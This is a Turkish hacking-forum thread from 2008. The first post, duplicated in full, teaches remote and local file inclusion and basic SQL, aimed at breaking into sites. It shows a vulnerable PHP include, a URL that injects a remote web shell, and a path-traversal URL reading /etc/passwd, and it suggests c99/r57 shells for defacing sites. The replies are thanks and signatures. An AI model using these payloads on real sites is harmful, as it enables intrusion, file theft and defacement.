Etiketler:
» Forum Kuralları «
1-)
Büyük Harfle Yazı Yazmak Bağırmak Anlamına Gelmektedir..Bu Nedenle Sadece Cümle Baslarında KuLLanıLaBiLir..!
2-) Küfürler,Ahlaksız Sözler Kesinlile Yasaktır..! [Aksi Takdirde Banlanacaksınız..!
3-) Üyeleri Assalııcak Sözler Yasaktır...
4-) Yapılan Emek Kötü Dahi Olsa Önce Saygı Önce Teşekkür Sonra Eleştiri Lütfen Sağduyulu Olun..
2-) Küfürler,Ahlaksız Sözler Kesinlile Yasaktır..! [Aksi Takdirde Banlanacaksınız..!
3-) Üyeleri Assalııcak Sözler Yasaktır...
4-) Yapılan Emek Kötü Dahi Olsa Önce Saygı Önce Teşekkür Sonra Eleştiri Lütfen Sağduyulu Olun..
| Yazar | Mesaj #136021 2008-07-01 00:59 GMT | |||||||||
SANAL_İNFAZ
|
.jpg)
HTT Üyesi  |
  |
| Şehir: |
| Toplam Konu Yazmış |
| Toplam 494 Mesaj Yazmış |
| Şehir: |
Ülke:  |
| Meslek: HACKER |
| Yaş: |
Selamun Aleyküm ;
Şimdi size çoğu sistemlere erişim için kullandığımız, scriptlerde mevcut olan ve büyük şirketlerin veritabanlarındaki açıklardan kısa ve öz bahsedicem.
Remote file inclusion açıkları ile sistemlere c99 veya r57 gibi benzer tarzı shell'ler upload edilerek sistemdeki diğer siteler kolayca deface edilebilmektedir.Bu tür acıkların meydana gelmesi coderlerin hatalarından meydana gelmektedir.Rfi uzaktan dosya okutmak anlamına gelmektedir.
include ve include_once php dosyasına dahil etme anlamını taşımaktadır.
Require ve require_once sayfaların kalan kodlarını yorumlar.
RFI açığı bulmada include,require,include_once,require_once, veriable gibi parametreler gerekir.
<?
include ($dark.’../config.php’) ;
?>
Kodumuzu sitemize attığımız zaman hata ile karşılaşacaktırız.bunun sayesinde sisteme shell sokabiliriz.
www.site.com/kod.php?dark=http://Shell
fakat kodumuz tanımlı olursa erişim yapamayız.
$dark: ‘files’; gibi.
Local file inclusion ise serverdan dosyayı okutmak demektir.Lfi rfi kadar sıklıkla kullanılmamaktadır ve tercih edilmemektedir.
<?
include (’files/$dark/config.php’) ;
?>
Koddaki dark tanımlı olmadığı için serverdan dosya okutabilirz,
ayrıca Rfi acıklarını Lfi olarakta kullabiliriz.
www.site.com/kod.php?dark=../../../etc/passwd
fakat $dark dosyamız tanımlı olursa Rfi Örneğinde verdiğim gibi;sistemden dosyayı okutamayız.
SQL ise veritabanlarında data çekme, silme ve değiştirme gibi işlemler için kullanılan basit yapılı bir dildir.Örneğin
DELETE FROM members WHERE id=dark
members tablosunda id si dark olan kayıdı silmek için kullanılan SQL cümlesidir.
SQL Injection ise web uygulamalarındaki en ciddi açıklardan birisidir.SQL Mantığını iyi kavrarsak büyük sistemlere kolayca erişim sağlayabiliriz.Kodların sorgulanmasının koruma altına alınmamamsı nedeni ile SQL açıkları meydana gelmektedir.SQL cümlecikleri oluşturulurken araya sıkıştırılan herhangi bir meta-krakter SQL Injectiona sebep olabilir.C temeli C#. php gibi dillerde backslash karakteri bir meta-karakteridir.Derleyici ve yorumlayıcılar bu krakterleri görünce sonrakileri ona göre işler.
Select deyimi SQL' da en çok kullanılan daha doğrusu kullanılması zorunlu olan temel bir komuttur.Bu komut ile veritabanından bize gerekli olan bilgileri alabiliriz.
Select * From uyeler;
Yukarıdaki komut ile üye tablosundaki tüm biligiler listelenecektir.Başka örneklere devam..
Select uye_adi,uye_soyadi From uyeler
Bu komutta uyeler tablosundaki uye_adi ve uye_soyadi bilgileri listeyecektir.
Biz bu komutlarımızda ilk önce Select deyimi ile seçme eylemini gerçekleştirdik, daha sonra ilk örnekte kullanımda yani * ile tüm colonları seçiceğimizi belirttik, sonrasında From ile tablo adı belirttik ve komutumuzu verdik listeleme işlemini gerçekleştirdik.Alttaki işlemde ise , kullanarak birden çok tablo bilgisi öğrenmeyi sağladık.
Şimdi size çoğu sistemlere erişim için kullandığımız, scriptlerde mevcut olan ve büyük şirketlerin veritabanlarındaki açıklardan kısa ve öz bahsedicem.
Remote file inclusion açıkları ile sistemlere c99 veya r57 gibi benzer tarzı shell'ler upload edilerek sistemdeki diğer siteler kolayca deface edilebilmektedir.Bu tür acıkların meydana gelmesi coderlerin hatalarından meydana gelmektedir.Rfi uzaktan dosya okutmak anlamına gelmektedir.
include ve include_once php dosyasına dahil etme anlamını taşımaktadır.
Require ve require_once sayfaların kalan kodlarını yorumlar.
RFI açığı bulmada include,require,include_once,require_once, veriable gibi parametreler gerekir.
<?
include ($dark.’../config.php’) ;
?>
Kodumuzu sitemize attığımız zaman hata ile karşılaşacaktırız.bunun sayesinde sisteme shell sokabiliriz.
www.site.com/kod.php?dark=http://Shell
fakat kodumuz tanımlı olursa erişim yapamayız.
$dark: ‘files’; gibi.
Local file inclusion ise serverdan dosyayı okutmak demektir.Lfi rfi kadar sıklıkla kullanılmamaktadır ve tercih edilmemektedir.
<?
include (’files/$dark/config.php’) ;
?>
Koddaki dark tanımlı olmadığı için serverdan dosya okutabilirz,
ayrıca Rfi acıklarını Lfi olarakta kullabiliriz.
www.site.com/kod.php?dark=../../../etc/passwd
fakat $dark dosyamız tanımlı olursa Rfi Örneğinde verdiğim gibi;sistemden dosyayı okutamayız.
SQL ise veritabanlarında data çekme, silme ve değiştirme gibi işlemler için kullanılan basit yapılı bir dildir.Örneğin
DELETE FROM members WHERE id=dark
members tablosunda id si dark olan kayıdı silmek için kullanılan SQL cümlesidir.
SQL Injection ise web uygulamalarındaki en ciddi açıklardan birisidir.SQL Mantığını iyi kavrarsak büyük sistemlere kolayca erişim sağlayabiliriz.Kodların sorgulanmasının koruma altına alınmamamsı nedeni ile SQL açıkları meydana gelmektedir.SQL cümlecikleri oluşturulurken araya sıkıştırılan herhangi bir meta-krakter SQL Injectiona sebep olabilir.C temeli C#. php gibi dillerde backslash karakteri bir meta-karakteridir.Derleyici ve yorumlayıcılar bu krakterleri görünce sonrakileri ona göre işler.
Select deyimi SQL' da en çok kullanılan daha doğrusu kullanılması zorunlu olan temel bir komuttur.Bu komut ile veritabanından bize gerekli olan bilgileri alabiliriz.
Select * From uyeler;
Yukarıdaki komut ile üye tablosundaki tüm biligiler listelenecektir.Başka örneklere devam..
Select uye_adi,uye_soyadi From uyeler
Bu komutta uyeler tablosundaki uye_adi ve uye_soyadi bilgileri listeyecektir.
Biz bu komutlarımızda ilk önce Select deyimi ile seçme eylemini gerçekleştirdik, daha sonra ilk örnekte kullanımda yani * ile tüm colonları seçiceğimizi belirttik, sonrasında From ile tablo adı belirttik ve komutumuzu verdik listeleme işlemini gerçekleştirdik.Alttaki işlemde ise , kullanarak birden çok tablo bilgisi öğrenmeyi sağladık.
__________________
| Yazar | Mesaj #136083 2008-07-01 03:37 GMT | |||||||||
cndss
|
.jpg)
Kıdemli Üye  |
 |
| Şehir: qimsenın qelemeyeceqı bı yer |
| Toplam Konu Yazmış |
| Toplam 395 Mesaj Yazmış |
| Şehir: qimsenın qelemeyeceqı bı yer |
| Ülke: |
| Meslek: |
| Yaş: |
Aleykum Selam
saol paylasm ıcın
saol paylasm ıcın
__________________
iletisim icin;
cndss@w.cn
cndss@hackturkiye.net
____________________________________
____________♥♥♥♥♥♥♥♥♥_______________
__________♥♥♥♥♥♥♥♥♥♥♥♥♥_____________
________♥♥♥♥♥_________♥♥______ ♥____
_______♥♥♥♥♥_________________♥♥♥♥___
_______♥♥♥♥♥______________♥♥♥♥♥♥♥♥♥♥
_______♥♥♥♥♥________________♥♥♥♥♥♥__
________♥♥♥♥♥_________♥♥___♥♥____♥♥_
__________♥♥♥♥♥♥♥♥♥♥♥♥♥_____________
____________♥♥♥♥♥♥♥♥♥_______________
____________________________________
iletisim icin;
cndss@w.cn
cndss@hackturkiye.net
____________________________________
____________♥♥♥♥♥♥♥♥♥_______________
__________♥♥♥♥♥♥♥♥♥♥♥♥♥_____________
________♥♥♥♥♥_________♥♥______ ♥____
_______♥♥♥♥♥_________________♥♥♥♥___
_______♥♥♥♥♥______________♥♥♥♥♥♥♥♥♥♥
_______♥♥♥♥♥________________♥♥♥♥♥♥__
________♥♥♥♥♥_________♥♥___♥♥____♥♥_
__________♥♥♥♥♥♥♥♥♥♥♥♥♥_____________
____________♥♥♥♥♥♥♥♥♥_______________
____________________________________
| Yazar | Mesaj #136097 2008-07-01 08:08 GMT | |||||||||
B@LAXIS
|
.jpg)
| Banlandı |
| |
| Şehir: ESki İsMim H@CKERDİ GERİ GELDİM |
| Toplam Konu Yazmış |
| Toplam 389 Mesaj Yazmış |
| Şehir: ESki İsMim H@CKERDİ GERİ GELDİM |
Ülke:  |
| Meslek: ESki İsMim H@CKERDİ GERİ GELDİM |
| Yaş: |
ben verdim klit
__________________
rütbe istedim banlandım.
rütbe istedim banlandım.
